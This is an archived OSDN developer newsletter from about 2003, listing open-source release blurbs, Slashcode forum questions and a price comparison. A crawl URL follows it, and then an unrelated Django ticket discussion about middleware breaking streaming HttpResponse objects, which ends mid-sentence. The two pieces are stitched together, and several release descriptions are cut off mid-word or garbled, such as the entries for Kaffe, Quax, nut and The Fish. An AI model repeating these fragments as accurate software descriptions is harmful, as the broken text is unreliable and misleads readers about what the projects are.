GPSFET (GPS Firmware Editing Tools) facilitates editing of Magellan GPS firmware. It allows you to, for example, replace the English words in the firmware with words in another, unsupported language, or add your personal information to the startup screen of the device. Other tools under development will allow modification of the graphical display of GPS data and the ability to upload (or import from SDCARD) vector and pixel maps obtained from free sources. Handy 0.2.0 Handy is a small commandline tool to synchronize a Lotus Notes appointment scheduler with KDE Organizer and a SIEMENS S35/S45 cellphone. It is able to read the result of the export function of a Lotus Notes client version 5.x. It converts such a file into a vCal 2.0 file for the Organizer and can send the appointments to a cellphone over the IR Port or the serial device. ifsplot 0.4 ifsplot is an IFS attractor (fractal) plotter. Given an IFS (a set of affine transformations), it generates associated fractal. The libplot library is employed, so any libplot driver is supported (X, eps, png, fig, etc.). Inside Systems Mail 1.6 Inside Systems Mail is a Webmail system that is programmed in PHP, makes heavy use of Javascript/DOM, and is designed to work with any IMAP server (including Microsoft Exchange). It aims to be quick and easy to use, with an interface that most users will find familiar and several options that help fine tune the Webmail experience. Jabber-SQL 0.1 Jabber-SQL allows authorized agents to execute SQL queries from a Jabber client and display the response in one or more channels. It can also be run in agent mode, in which case in addition to receiving new queries, it will automatically poll preconfigured queries at specified intervals and display the responses in one or more channels. Jabberwocky 2.0.05 (Development) Jabberwocky is a Lisp IDE containing a Lisp-aware editor with syntax highlighting, parentheses matching, a source analyzer, indentation, a source level debugger, a project explorer, and an interaction buffer. It is the replacement for the Lisp Debug project. JXPM 1.0 JXPM is an XPM processing library for Personal Java. It is coded 100% in Java, and is capable of reading and writing XPM images that are compressed with LZ77 (gzip). It supports color XPMs, transparent pixels (the "none" color name), color names (such as "SeaGreen" or "DarkRed"). It works with java.awt.Image, supporting both the IndexColorModel and the DirectColorModel. It also supports TrueColor XPMs, but the design of the XPM format (color indexing) causes writing to be performed faster than reading, especially for large number of colors (>256). kaffe 1.1.0 (Development) Kaffe is a complete, PersonalJava. Knoppix 3.2-2003-06-06. kses 0.1.0 kses is an HTML filter written in PHP. It filters all HTML elements and attributes that are not allowed, no matter how strange or tricky the HTML code is. This is helpful to stop cross-site scripting security holes. libcff 0.1 libcff provides a kind of C++ continued fractions toolkit. It lets you easily create continued fractions and estimate truncation errors. It also offers reliable continued fraction evaluation and approximating functions using continued fractions. libowfat 0.15 libowfat aims to reimplement the API defined by Prof. Dan Bernstein as extracted in the libdjb project. However, the reimplementation is covered by the GNU General Public License. The API is also extended slightly. LibZT 1.0.1 LibZT is a collection of utility code for C application/server development. It contains a ubiquitous logging subsystem, configuration file parser, commandline option parser, and numerous handy tools that need to be written for just about any project (wrappers to malloc, etc). LostIRC 0.2.7 LostIRC is a simple, yet very useful IRC client. It has features such as tab-autocompletion, multiple server support, automatic joining of servers/channels, and DCC sending, which should cover the needs of most people. Another design goal is 100% keyboard controllability. LostIRC was written using the gtkmm GUI library. Magic Cube 4D 2.1 MagicCube4D is a fully functional four-dimensional version of the Rubik's Cube puzzle. mailutils 0.3.1 mailutils contains a series of useful mail clients, servers, and libraries. These are the primary mail utilities of the GNU system. Max_links 0.01 Max_links is a simple link directory for Web sites. It uses PHP, MySQL, and CSS. mcGallery 2.0 (Professional) mc. Meta-Aqua 1.1 Meta-Aqua is based on the Sawfish theme "Aquaified" by Justin Hahn, using the same artwork. MIB Smithy 2.1.3 MIB Smithy is an application for SNMP developers, MIB designers, and Internet-draft authors. It provides a GUI-based environment for designing, editing, and compiling MIB modules according to the SMIv1 and SMIv2 standards. It accelerates the development process by providing an easy-to-use GUI environment for designing, editing, and compiling SNMP MIB specifications without the syntax and formatting concerns of designing MIBs by hand. It includes a number of built-in basic SNMP management tools, XML support, and (with MIB Smithy Professional) support for custom compiler output formats. MLdonkey 2.5-3 (Stable) MLDonkey is a multi-network file-sharing client. It was the first open-source client to access eDonkey. It runs as a daemon, that can be controlled through telnet (command-line), HTTP (Web pages), and many different GUIs. It is written in Objective-Caml. It can currently access eDonkey, Overnet, Fasttrack (KaZaA, Imesh), Gnutella, Gnutella2 (Shareaza), BitTorrent, and Soulseek. Support for other networks (Direct Connect, Open Napster) is only partial. MMS Diary 0.94). moodss 17.3 Mood. It can react to thresholds and record data history in any database for later analysis or for presentation using common software. MusicControl 0.1 MusicControl is designed to put you in control of the music that gets played from your computer. It supports MP3, Ogg, and various module formats. MyAdvogato 1.0.1 (Stable) MyAdvogato is a fully-customizable CGI that acts as a wrapper for Advogato. In each call it fetches pages from the original Web site, modifies them on the fly according to user preferences, and returns the result. mysqlISP 1.1 mysqlISP lets you manage ISP customers, resellers, and their resources, and allows you to centralize resource and product usage. It works alone or in conjuntion with mysqlRadius, mysqlApache, mysqlBind, and mysqlSendmail applications of the openISP suite. A user-friendly, 100% template driven -skin- interface ism|4 is also available from a third party (mysqlIPM and mysqlRadacct are also supported.) nanoweb 2.2.0. NetDraw 2.0 NetDraw is a simple Network drawing application. You can connect to a remote host and start to draw, and the remote host sees your drawing in real-time and can print and save it. NetThello 1.2 NetThello is a simple but fully functional Othello game written entirely in Cocoa. It includes support for two players on a single computer, playing over the Internet, and against a computer player. Noble Ape Simulation 0.662 The Noble Ape Simulation creates a random island environment and simulates the ape inhabitants of the island's cognitive processes. It features the Ocelot landscape rendering engine. num-utils 0.3. nut 8.8 nut. ObjectScript 1.3 (Stable), etc. Since it can be interactively interpreted, ObjectScript can be used to debug or learn Java systems. And since it supports extending Java classes and interfaces, it can add sophisticated scripting to an existing Java application. OpenGUI 4.1.0. openMosix Cluster for Linux 2.4.20-3. PCX Portal 0.3 (UserProperties) The PCX Portal provides a desktop environment, company, user and app management, context sensitive help, and multi-lingual support. It is written in Perl, and designed to provide the foundation for Web-based applications that need all of the above. PCX Portal 0.0.09 (template app) The PCX Portal provides a desktop environment, company, user and app management, context sensitive help, and multi-lingual support. It is written in Perl, and designed to provide the foundation for Web-based applications that need all of the above. PCX Portal 0.2.01 (pcxportal) The PCX Portal provides a desktop environment, company, user and app management, context sensitive help, and multi-lingual support. It is written in Perl, and designed to provide the foundation for Web-based applications that need all of the above. photos 3.5b1 photos. Project Manager X 1.75 PMX is a simple project management tool for OS X. It allows you to track, group, and manage project items and resource allocation. It displays the project in a nice Gantt Chart that can be printed. It requires Mac OS X 10.2.3 or greater. Quax 0.9-2 Qu. ratpoison 1.2.2 Ratpoison is a simple window manager with no large library dependencies, no fancy graphics, no window decorations, and no rodent dependence. It is largely modeled after GNU Screen, which has done wonders in the virtual terminal market. All interaction with the window manager is done through keystrokes. ratpoison has a prefix map to minimize the key clobbering that cripples EMACS and other quality pieces of software. All windows are maximized and kept maximized to avoid wasting precious screen space. Samba 3.0.0 beta1 (3.0.x). SDBA Revolution 1.86, and the ability to use multiple access lists. It makes writing IM apps very much like writing mod_perl or PHP pages. It currently supports AIM, MSN, ICQ, YIM, and Jabber. The homepage has full tutorials and documentation. SDLPong 0.2 SDLPong is a Pong clone that is intended to feel "authentic", while adding additional features to extend gameplay. Sophie 3.03 (V3) Soph. sql++ 0.09 sql++ is an easily configurable, feature-rich, portable command-line SQL tool. It can be used with many different databases and in place of other command-line tools such as MySQL's mysql-client and Oracle's sqlplus. It has features such as multiple connections, multi-database interfacing, subselects for all databases, regardless of whether the database has native subselects or not, and much more. swsusp 1.0 pre5 (2.4 Development). System Watcher 0.2 Watcher is a daemon that gets some system information and stores it on a pre-configured file. The information stored by watcher are uptime, running processes, disk free blocks, disk used blocks, system users, etc. System-Down::Rescue 1.0.0pre4 System-Down::Rescue is a free downloadable live distribution. It is designed to recover damaged file-systems, copying the data around other physical discs or networks, or burning them on a CD-ROM, using cdrecord. It features a working hardware detection system. TarProxy 0.29 TarProxy is a statistically driven, pluggable SMTP proxy that can be used to deny spammers access to your bandwidth. tasks 1.6 rc1 tasks is built on PHP and MySQL. It features a dynamic hierarchical view of your tasks, scheduling due dates and associating URLs with tasks, an iCalendar of your tasks (scheduled tasks can go into the calendar as events or task list). and a mobile version for easy access with a PDA. The Fish 0.4.1 The. The Gallery 1.3.4-RC3 (1. The SlotSig library 0.2 The. TkPasMan 2.2a (Stable) TkPasMan is a simple program that lets you store usernames and passwords for access to forums, mailing lists, and other websites. It is inspired by gpasman, but has more `paste' possibilities. For example, you can just paste username and then password behind it. tower toppler 1.0.2 Tower Toppler (aka Nebulous) is the reimplementation an old 'jump and run' game. In this game you have to climb to the top of a tower avoiding all kinds of creatures that want to push you down. tvrec tools 0.1 tvrec tools is a set of scripts for controlling an alternative capture-script to record TV with a Linux system. These shell scripts, together with some other standard Linux programs, allow you to trigger recording, view recording status, and delete the whole recording queue via email or SMS (short message service). Uml2Daml Converter 0.4 (Development) The Uml2Daml Converter is a GUI application for automated transformation of UML 1.4 class diagrams (in XMI 1.1) into DAML+OIL or RDFS (RDF Schema) ontologies. It is also possible to visualize the ontologies as directed graphs. Since transformations are based on the XMI 1.1 standard, DAML+OIL/RDFS ontologies can be modeled with any UML tool able to produce XMI 1.1/UML 1.4 (such as TogetherJ 6.0). Velocity editor plugin for Eclipse 1.0.2 Velocity editor plugin for Eclipse provides an editor for the scripting language of Jakarta's template engine Velocity. The editor is implemented as an plugin for the Eclipse platform. Vex 0.4.1 Vex is a visual editor for XML. It features a word processor-like interface. Video Disk Recorder 1.2.1 Video Disk Recorder (VDR) is a digital sat-reciever program using Linux and DVB technologies. It can record MPEG2 streams, as well as output the stream to TV. It also supports plugins for DVD, DivX, or MP3 playback and more. Vipul's Razor 2.34. VLevel 0.4 VLevel is a dynamic compressor that amplifies the quiet parts of music. It uses a look-ahead buffer to provide gradual changes, and never causes clipping. A command line filter and a LADSPA plugin are provided, and XMMS is supported. Worker 2.8.0. WowBB 1.3 WowBB is an innovative bulletin board with features including an auto install/upgrade, a WYSIWYG editor with integrated spell-checker, automatic time zone detection, topic-level new post tracking, smart caching, a visual style editor with real-time preview, and native file format support for major bulletin boards. XChat-Ruby 1.0. Xdebug 1.2.0 The Xdebug PHP extension aids script debugging by providing a lot of valuable information, including stack and function traces in error messages, memory allocation traces, and protection from infinite recursions. Xdebug also has a built-in debugging server which you can access with a debug client to debug your scripts remotely. Stepping, accessing data, and examining stacktraces are a few of the remote capabilities. XIWA 1.4.1 (Beta) XIWA (XIWA Is Web Accounting) is a Web-based accounting package built with Perl and PostgreSQL. It supports Double Entry/Stocks and has a powerful, flexible reporting engine. xtermset 0.5.2 xtermset is a command line utility to change several characteristics of an xterm. These are things like title, foreground color, background color, geometry and position. Furthermore the xterm can be iconified, restored to normal size, or refreshed. YaRET 2.0.11 Y). ZIPDrop 0.1 ZIPDrop is a small Droplet which is meant to create zip files using the OS X command line zip utility. You can drop a folder onto it and get a .zip file with the content of the folder. .zip files generated by ZIPDrop are compatible with Stuffit Expander and WinZip. Slashcode Handling logging issues I'm using cronolog for my apache logs, and I really, really like it. I'd like to be able to use it on the slash logs as well, which become large and cumbersome over time with many sites running on a server. How do you all handle your logs? What do you use for log rotation? How long do you keep logs? Is anyone using cronolog, or something like it with slash? RSS to Story?? launch of slash site "stupidsecurity.com" Announcing the opening of StupidSecurity.com. The site is meant to be a chronicle of idiotic and deceptive "security" measures. From the "three questions" that the airlines finally stopped asking to the closing of Meigs Airport in Chicago supposedly for security reasons, we want YOUR gripes about security measures that are just plain dumb! I'd welcome submissions (the stupider the better!), comments, complaints, and praise! MySQL 4.1+ I want to start using MySQL 4.1 to take advantage of the new Spatial extensions in MySQL to further enhance my plugin. I saw the recent story referring to using MySQL 4, but no direct mention of experience with versions 4+. Any tips or recommendations? Should I make the upgrade only on my development box, or is using 4+ okay. Any experience with 4.1, which is alpha? Section-specific Quick Links I'm in the process of setting up a intranet Slash 2 site for a company.. Need help building Slash templates I have comps for a site I want built in Slash. While I have worked with Movable Type, building Slash templates is a whole different beast. I need someone to help me convert my comps into a functioning Slash site. If you have these skills, please drop me a line with your rates and scheduling availability. You can see what the site will look like here. --Markos Preventing duplicates from being posted I'm getting sick of seeing duplicate posts all the time on Slashdot. I have a feature-request/enhancement that I would like to request for slashcode. It would be nice if before a moderator submits a story to check all of the URLS in that post and match it with the previous weeks/months stories for the same URL. If there is a match, throw up a warning saying that this story is a possible duplicate. This will help the moderator out too, since they wouldn't have to read every story on slashdot in the past two weeks. What do you think? Is this doable? --Min Idzelis. Adding ispell after slash is installed Hi, I read the (archived) thread at: 724238&mode=thread and I have "Running Weblogs with Slash", so I know that "... Slash 2.2 has added an ispell compatibility mode. If the ispell program exists and points to an ispell binary, the Edit Story page will include a list of potentially misspelled words.)" (thanks blagger), but I don't know how exactly what to add, and into what directory,. I installed freebsd 5.0, then built and installed the slashcode port, and now I've installed ispell. I then tried adding symlinks to ispell into various directories, including /usr/local/slash/bin, and restarting my browser and the freebsd box. Nothing obvious changes. Can someone tell me exactly which file to put where to enable spell-checking? I'm running slash-2.2.6 on Freebsd 5.0. Thanks... P.S. Sorry if I misspelled anything, but.... Price Compare 256MB Secure Digital Card (SanDisk) Lowest Price: $60.00 JumpDrive Trio USB (Lexar Media) Lowest Price: $13.99 128MB Magic Gate Memory Stick Duo (Sony) Lowest Price: $74.49 256MB Secure Digital (Lexar Media) Lowest Price: $69.99 256MB CompactFlash Type I (SanDisk) Lowest Price: $52.90 Power Mac G4 (Apple) Lowest Price: $895.00 iMac PowerPC G4 800MHz 256MB 60GB CDRW/DVD-R (Apple) Lowest Price: $1794.00 XTREME - EXPLORER X4000 PC Intel Pentium 4 Processor 1.60 GHz, 256MB DDR, 40GB (Xtreme) Lowest Price: $558.00 Dimension 8200 (P4 2.2 GHz, 256MB, 40GB, CDRW) (Dell) Lowest Price: $1298.00 X3000 (AMD Thunderbird 1.2GHz, 512MB, 20GB 52X CD-ROM) (Xtreme) Lowest Price: $445.00 South Beach Diet by Arthur S. Agatston (Trade Cloth) Lowest Price: $10.98 Harry Potter and the Order of the Phoenix by J. K. Rowling (Trade Cloth) Lowest Price: $16.19 Haley's Hints by Graham Haley (Trade Cloth) Lowest Price: $15.99 Living History by Hillary Rodham Clinton (Trade Cloth) Lowest Price: $16.47 South Beach Diet by Arthur S. Agatston (Trade Cloth) Lowest Price: $15.19 ================================================== Copyright (c) 2002 OSDN. All rights reserved. Reproduction in whole or in part in any form or medium without express written permission of OSDN is prohibited. -------------------------------------------------- url - email - [EMAIL PROTECTED]
https://www.mail-archive.com/osdn-developer-txt-mm@newsfeed.osdn.com/msg00303.html
CC-MAIN-2020-34
refinedweb
6,111
57.47
Thanks for posting this and the previous video on using tailwindcss. It's helpful to see the main themes reinforced in each of the videos. One thing that I'm struggling with is what seems like a violation of POLS and the Rails-way in general where we are now putting SCSS files inside a javascripts folder. I understand that webpacker can just figure this out for us, but if I'm debugging a styling issue in an app I'm unfamiliar with I'm not sure I'd start by looking in a javascripts folder. Is there not a way to keep the separation of concerns explicit and store the stylesheets outside of the javascripts folder? The recommended place for stylesheets in Rails 6 is still the asset pipeline. Tailwind is a css framework generated by JS so it needs to be more tied to things than Bootstrap. This is all just side effects of whats going on in modern frontend. Rails is just trying to make that easier, unfortunately it is pretty messy I think, but its also doing more complex things now. @Chris Bloom You can set up webpacker to look in app/assets too. I tend to keep using app/assets/javascripts and app/assets/stylesheets, but app/javascripts for vue/stimulus/… components. See for example: Hi Chris, Another concern is the location of custom javascript. I am new to Rails so please excuse my ignorance. In Rails 5 we would add custom js to their own .coffee files. For Blog model I would write custom js in blog.coffee file and so on. In Rails 6 all javascript gets added to a single file i.e application.js How can I keep them seggregated? I've created a demo app with Rails 6 + Webpacker + Bootstrap (with CoreUI), no Sprockets Hey Chris , I'm getting this error: Webpacker can't find application in /Users/robthomas/Dropbox/rails/sample/public/packs/manifest.json. Possible causes: webpack -wor the webpack-dev-server. Extracted source (around line #10): <%= stylesheet_link_tag 'application', media: 'all', 'data-turbolinks-track': 'reload' %> <%= stylesheet_pack_tag 'application', media: 'all', 'data-turbolinks-track': 'reload' %> <%= javascript_pack_tag 'application', 'data-turbolinks-track': 'reload' %> The error is on the <%= javascript_pack_tag 'application', 'data-turbolinks-track': 'reload' %> You can run bin/webpack to run webpack and see what the compilation error was. I'm getting error Command "webpack" not found. I did and I got this: yarn install v1.16.0 [1/4] 🔍 Resolving packages... success Already up-to-date. ✨ Done in 0.45s. Hi there, What is stylesheet_pack_tag really for in Rails 6? I mean if you import your styles in packs/application.js as done in this episode, webpack doesn't generate any css file. Moreover if you inspect your HTML there is no reference to css file neither. I have done teh same in a sample app, without including stylesheet_pack_tag and the styles are anyway applied to the view. This is making me very confused, The stylesheet pack tag is used for serving stylesheets in production, or in development if you have it configured that way. @chris any comment on using stylesheet_pack_tag with Hot Module Reloading (hmr)? The README states: If you have hmr turned to true, then the stylesheetpacktag generates no output, as you will want to configure your styles to be inlined in your JavaScript for hot reloading. During production and testing, the stylesheetpacktag will create the appropriate HTML tags. From Sigfrid's comment above, I'm guessing we should avoid stylesheet_pack_tag and instead import the css in packs/applications.js. This article suggests a similar approach: In order to do so [use hmr], we need to activate it in webpacker.yml and not import the stylesheets via stylesheetpacktagsince they will be included from packs/application.js However, it seems to me that the suggested solution still uses stylesheet_pack_tag: # packs/application.js import './stylesheets' and # app/views/layouts/application.html.erb <%= stylesheet_pack_tag 'stylesheets', 'data-turbolinks-track': 'reload' unless Webpacker.dev_server.hot_module_replacing? %> Hi there, thanks for all of the webpack/rails 6 tutorials. They've been really helpful in upgrading a very old rails app to the latest and greatest. I'm having one small error however. I have a couple of Bootstrap modal dialogs that get populated via an AJAX request. These POST data to the server, which responds with a JS file with $('#myModal').modal('hide'); WIth the old asset_pipeline method this worked, but I'm now getting this error: Uncaught TypeError: $(...).modal is not a function if I include a jQuery command in the file it's available, but any bootstrap function isn't. Any idea on how to expose all of the Bootstrap functions to the entire application? The $(…).modal is not a function.. Thanks for the reply @leneborma I should have been a little clearer in my explanation. The modal dialog, and all other bootstrap JS (eg tooltips, popovers etc), works well when browsing around the site normally, it's just when I return Javascript from the server after processing the form that appeared in the modal dialog that I get that error. Step by step: 1) Browse to "New Order Page" 2) Fill in form 3) Click on "Add New Item" button, which opens a modal dialog (via data-behaviour tags) that retrieves a form from the server. 4) Submit the "Add New Item" form. This returns some javascript from the server (via AJAX) which puts a new row on the bottom of the order, and attempts to close the modal dialog. It's at this point that the $('#myModal').modal('hide'); causes an error. So, I'm not sure why it works at the start, and then stops working when processing the Javascript from the server. The jQuery that adds the new row works, but the modal command fails. There's nothing in the Javascript from the server that reloads the jQuery, so I'm not sure if it's Turbolinks being weird, or if it's something altogether. Thanks. Find the solution in the @Jun Jiang repo cybros_core. We need to expose jQuery to the window object : # packs/application.js import JQuery from 'jquery'; window.$ = window.JQuery = JQuery; Why HTML rendering faster instead css/js on this tutorial? Can they explain to me, thank you Chris thanks for the tutorial. I've noticed though in a comment you mentioned its still best to use css inside assets/stylesheets. However with this in place you can't use mixins. If my style sheet is in javascript/stylesheets the mixin has no problems When i add @import "../node_modules/bootstrap/scss/bootstrap"; to my stylesheet inside assets stylesheets, the mixins work but thats making webpack redundant so im at a loss. Doesnt this completely make the asset pipeline redundent or am i missing something ?? You should be able to use mixins in the asset pipeline, as long as your filename ends in .scss so it gets processed with scss. It won't hurt to use Webpacker for everything. In fact, you need to in some cases like when you're using TailwindCSS. Images don't really need to go through it since they don't need to be preprocessed and if you have simpler CSS, then the asset pipeline is still around for that. Thanks for the reply. I can use mixins if i import bootstrap into a .scss stylesheet inside of assets/stylesheets. If i use the setup in the video then i can use bootstrap javascript but mixins are not available inside .scss assets/stylesheets. They are only available in javascript/stylesheets. I thought it may be some error on my side but after trying three different fresh rails projects all had the same outcome h1 { color: white; } @include media-breakpoint-only(xs) { h1 { margin-top: 500px; } } Thats the simple scss im using. I'll stick to using webpack then for stylesheets. If its all loaded using yarn doesnt make sense to add it another way just for styling. adding the below into asset pipeline stylesheet fixes the mixin problem though. @import "../node_modules/bootstrap/scss/bootstrap"; I might just remove the asset pipeline all together seeing as though im not going to use it at all and webpack can handle images too. Chris, I followed your instructions, and everything works well except when a view is rendered from an action of a controller that does not inherit from ApplicationController. If the controller inherits directly from ActionController::Base, the view is not styled by bootstrap. What's the deal with that? Any insight you can offer would be greatly appreciated! Does it render a different layout? And if so, have you included the stylesheet tag in that layout? Chris, thanks for the qick reply! Your comment about "layout" inspired me to read the docs and now I understand how controllers decide what layout to use. Inserting layout "application" in the controller inheriting from ActionController::Base fixed the issue. I now understand too that I could have made a sperate layout with the same name as the controller, or its parent, and put the stylesheet tag in it, and all would work as expected. Appreciate your help! Keep up the great work! Join 27,623+ developers who get early access to new screencasts, articles, guides, updates, and more.
https://gorails.com/forum/how-to-use-bootstrap-with-webpack-rails-discussion
CC-MAIN-2019-51
refinedweb
1,542
65.12
Opened 10 years ago Closed 5 years ago Last modified 5 years ago #7581 closed New feature (fixed) Middleware accessing HttpResponse.content breaks streaming HttpResponse objects. Description ConditionalGetMiddleware, GZipMiddleware, CommonMiddleware, and CsrfMiddleware all access response.content directly or indirectly. This prevents a streaming response from being initiated until any generator passed to the HttpResponse as content is consumed, which can cause a timeout when trying to stream large dynamically generated content. I've already put together a patch based on the assumption that HttpResponse._is_string being False indicates content has been passed in as a dynamic generator and thus we shouldn't delay streaming a response to the browser while consuming the entire generator. The patch implements the following: - Allow middleware to assign a new generator to HttpResponse.contentwithout consuming it (e.g. GZipMiddleware) - Compress chunks of content yielded by HttpResponse._containerprogressively in GZipMiddlewareto allow streaming GZipped content - Only generate an ETag in CommonMiddlewarefrom HttpResponse.contentif HttpResponse._is_stringis True - Only check that the length of HttpResponse.contentis less than 200 in GZipMiddlewareif HttpResponse._is_stringis True - Only set the Content-Length header in GZipMiddlewareand ConditionalGetMiddlewareif HttpResponse._is_stringis True With CommonMiddleware enabled by default and breaking the streaming response functionality if ETags are enabled in settings.py, I'd consider this a bug. It can be worked around by manually specifying a bogus ETag before returning the response, which doesn't seem ideal. With this patch, users still have the option of consuming a generator before passing it to the HttpResponse in order to enable ETag and Content-Length headers, and conditional GZipping when the content length is less than 200. With CsrfMiddleware, the generator is only consumed when the Content-Type header is text/html or application/xhtml+xml, which may be an acceptable compromise - no streaming response for HTML content if you choose to use django.contrib.csrf. This patch accesses HttpResponse._is_string and HttpResponse._container from external middleware classes. Perhaps these properties could be made public and/or renamed to be more logical in this context? Attachments (8) Change History (57) comment:1 Changed 10 years ago by Changed 10 years ago by add HttpResponse.content_generator, consume generators only once, set Content-Length in WSGIHander. comment:2 Changed 10 years ago by From reading the patch I'm not sure why _get_content_generator is needed. You can always iterate over HttpResponse by calling iter() on it. What am I missing? comment:3 follow-up: 4 Changed 10 years ago by content_generator (and thus _get_content_generator) are needed so middleware have a public attribute to check for the existence of and return the actual content generator that was passed to HttpResponse. We could change _get_content_generator to return iter(self) instead, but we'd still need _get_content_generator to return a generator only when one was passed to HttpResponse. I think there might also be a problem if we return iter(self) to middleware. Because HttpResponse.next encodes each chunk as a bytestring, this could potentially encode each chunk multiple times if middleware sets a new content generator which yields unicode (or other) data, e.g. response.content = (something(e) for e in iter(response)) if something returned unicode. We'd also be passing a bytestring to something instead of the original content chunk. Even if something did not return unicode, it would at least call str on each chunk multiple times. Isn't it better to pass the original content generator to middleware, and only call HttpResponse.next on each chunk once when HttpResponse.content is finally accessed, which can only happen once as the generator is replaced with string content when that happens? Changed 10 years ago by fix django.contrib.csrf to work with content generators. comment:4 follow-up: 5 Changed 10 years ago by Replying to Tai Lee <real.human@mrmachine.net>: content_generator(and thus _get_content_generator) are needed so middleware have a public attribute to check for the existence of and return the actual content generator that was passed to HttpResponse. We could change _get_content_generatorto return iter(self)instead, but we'd still need _get_content_generatorto return a generator only when one was passed to HttpResponse. or as a stream with iter(response). After discussion on the list I agree with Malcolm that middleware already knows if it wants the whole content or can stream it. I think there might also be a problem if we return iter(self)to middleware. Because HttpResponse.nextencodes each chunk as a bytestring, this could potentially encode each chunk multiple times if middleware sets a new content generator which yields unicode I have as many as 3 points to say about it, please don't fall asleep! :-) -. - When HttpResponse iterates over itself the first time it should just save already encoded stream to avoid encoding multiple times as well as iterating. I mean instead of self._container = [''.join(self._container)]it should be like self._container = [''.join([s for s in self])] -: class HttpResponseWrapper(object): def __init__(self, response, iterable): self.response, self.iterable = response, iterable def __iter__(self): return iter(self.iterable) def __getattr__(self, name): return getattr(self.response, name) response = HttpResponseWrapper(response, gzip_content_generator(response)) comment:5 Changed 10 years ago by Replying to Ivan Sagalaev <Maniac@SoftwareManiacs.Org>:or as a stream with iter(response). After discussion on the list I agree with Malcolm that middleware already knows if it wants the whole content or can stream it. I think that middleware needs to be able to modify the response in different ways (or not at all) if the content is derived from a generator, so there needs to be a public attribute we can check to determine if the content is derived from a generator or not. An example is that CommonMiddleware should not generate an ETag or ConditionalGetMiddleware should not set Content-Length if content is derived from a generator. Another is that GZipMiddleware can compress the entire content in one operation if content is not derived from a generator, which may be more efficient or result in higher compression then compressing each chunk sequentially? -. By giving middleware access to the original content generator we can delay the conversion to byte string until HttpResponse.content is accessed, either by a middleware that requires the entire content or by WSGIHandler, and be sure that it occurs only once. - When HttpResponse iterates over itself the first time it should just save already encoded stream to avoid encoding multiple times as well as iterating. I mean instead of self._container = [''.join(self._container)]it should be like self._container = [''.join([s for s in self])] If encoding should be performed in next, then should _get_content be altered to simply return ''.join(self._container) after consuming the generator with self._container = [''.join(self)]? And should next behave like _get_content does now and not encode if Content-Encoding is set, otherwise use smart_str? -. Indeed, those middleware that can operate on chunks of content should not consume the content generator, but should only replace it with a new generator. This is the problem solved by this patch where middleware that are not aware of a content generator consume it and break streaming.: Middleware can already replace the content generator with response.content = (something(chunk) for chunk in response.content_generator), because _set_content will check if the value is an iterable or a string. As mentioned above, I think we need to expose content_generator for two purposes. The first is to indicate to middleware that the response is derived from a generator so that the middleware can skip incompatible functionality (e.g. ETag generation) or replace the content generator instead of replacing the content directly. The second is to provide access to the original content generator. Currently next will encode any value that is unicode. If a middleware sets a new content generator which yields a unicode value (e.g. response.content = (unicode(chunk) for chunk in response), the encoding will occur twice. comment:6 Changed 10 years ago by The more I think about this, the more I'm -1 on it. The complications of trying to force lazily-evaluated responses are far too numerous (ranging all the way from resource leaks on the Django side out to things like WSGI forbidding useful HTTP features which help with this) and the existence of specialized solutions for doing long-lived HTTP and/or asynchronous stuff are too plentiful to justify Django special-casing enough stuff to make this work. comment:7 Changed 10 years ago by I don't understand the resistence. Streaming HttpResponse functionality has been in trunk for around 2 years now. All I'm suggesting is that we fix certain middleware that ships with Django to work with the streaming functionality that's already present in trunk where possible and appropriate - e.g. GZip, ETag, etc., and to add a public attribute to HttpResponse to aid the conditional execution of middleware code. If there are certain middleware that cannot work with dynamic content generators, they continue to work as they do now. If there are certain handlers (WSGI) which don't at present work without a Content-Length header, they continue to work as they do now. Middleware authors can continue to develop middleware without even being aware that anything has changed. Existing 3rd party middleware will continue to work as it does now. This should be backwards compatible. I don't see how what's been added (essentially just skipping certain middleware functionality if a generator was used, or being able to replace an existing generator with a new one) would cause any of the numerous complications you mention that aren't already and haven't already been present for the past 2 years. comment:8 Changed 10 years ago by I was thinking about this some time and changed my mind a little... I agree with Tai Lee that this ticket is not about some abstract ultimate way for keeping streaming responses remain streaming after middleware. It's about fixing some points that can be fixed. However I now think that current patch does it the wrong way for two reasons. - It relies on how the response was constructed which doesn't always correlate with the need to apply certain middleware. For example one may still want to count ETag or gzip content of small files which will be treated as generators. - Gzipping a stream just can't work because WSGI wants Content-length to be set for response and it's impossible to count without gzipping the whole contents. So may be what's really needed here is a simple way for a view to explicitly flag the response with "don't gzip it" or "don't etag it". comment:9 Changed 10 years ago by I agree that it would also be useful to be able to disable certain middleware per HttpResponse. You are correct in saying that the way a response is created won't always indicate which middleware we want to disable. However, if a certain middleware CAN run without breaking a content generator (e.g. GZip when not using WSGI), shouldn't it do so? How would such a feature be implemented? Pass a list of middleware (e.g. ['django.middleware.common.CommonMiddleware', 'django.middleware.gzip.GZipMiddleware'])? That could be prone to error, requiring people to remember which middleware are required to be removed in order to preserve streaming functionality. What about setting a boolean attribute consume_generator on HttpResponse which defaults to True. If this is True, then the generator is consumed immediately and replaced with the resulting content string. If it's False, then either any middleware or partial functionality within some middleware that can't work without consuming the content generator are skipped? Changed 10 years ago by add stream_content argument. comment:10 Changed 10 years ago by Updated patch to add a stream_content argument (defaults to False) to specify whether or not content generator should be consumed immediately. Middleware can then assume that if content generator exists, user intended it to be preserved. Default behaviour will be to consume content, and if middleware authors want to (and can) work with streaming content, all they need to do is set response.content to a new generator (and we make response.content_generator) available publicly so they can alter the original generator if one is set. comment:11 Changed 10 years ago by if a certain middleware CAN run without breaking a content generator (e.g. GZip when not using WSGI), shouldn't it do so? I don't think so. It would break feauture parity between mod_python and WSGI and thus will make it harder for users to switch deployment scheme. Furthermore WSGI requiring Content-Length is a good thing because otherwise browsers won't show download progress. I think it's a bad side effect. What about setting a boolean attribute consume_generator on HttpResponse which defaults to True. The point of my previous comment was that there shouldn't be a generic attribute at all. Because generically it doesn't make any sense. I really meant just this: def my_view(request): response = HttpResponse(open('somefile')) if os.path.getsize('somefile') > 1024: response.dont_gzip = True class GzipMiddleware: def process_response(self, request, response): if getattr(response, 'dont_gzip'): return And similar attribute for CommonMiddleware about etag. In other words, I think that the fact that certain two middleware can skip their action in a very certain conditions should remain their own detail and shouldn't affect other parts of the framework. comment:12 Changed 10 years ago by The WSGI specification does NOT require that Content-Length be specified for response. If you are making assumptions based on that belief, they will be wrong. comment:13 Changed 9 years ago by Milestone post-1.0 deleted comment:14 Changed 9 years ago by comment:15 Changed 9 years ago by Re-targeting for 1.2. comment:16 Changed 9 years ago by There is a bug in the function utils.text.compress_sequence provided in the patch. Because it never closes the zfile, it misses a few trailing bytes of output, causing invalid output. Some decompressors (e.g. many browsers) seem tolerant of this, but many (e.g. Googlebot, gunzip) are not. The fix is straightforward; patch to text.py 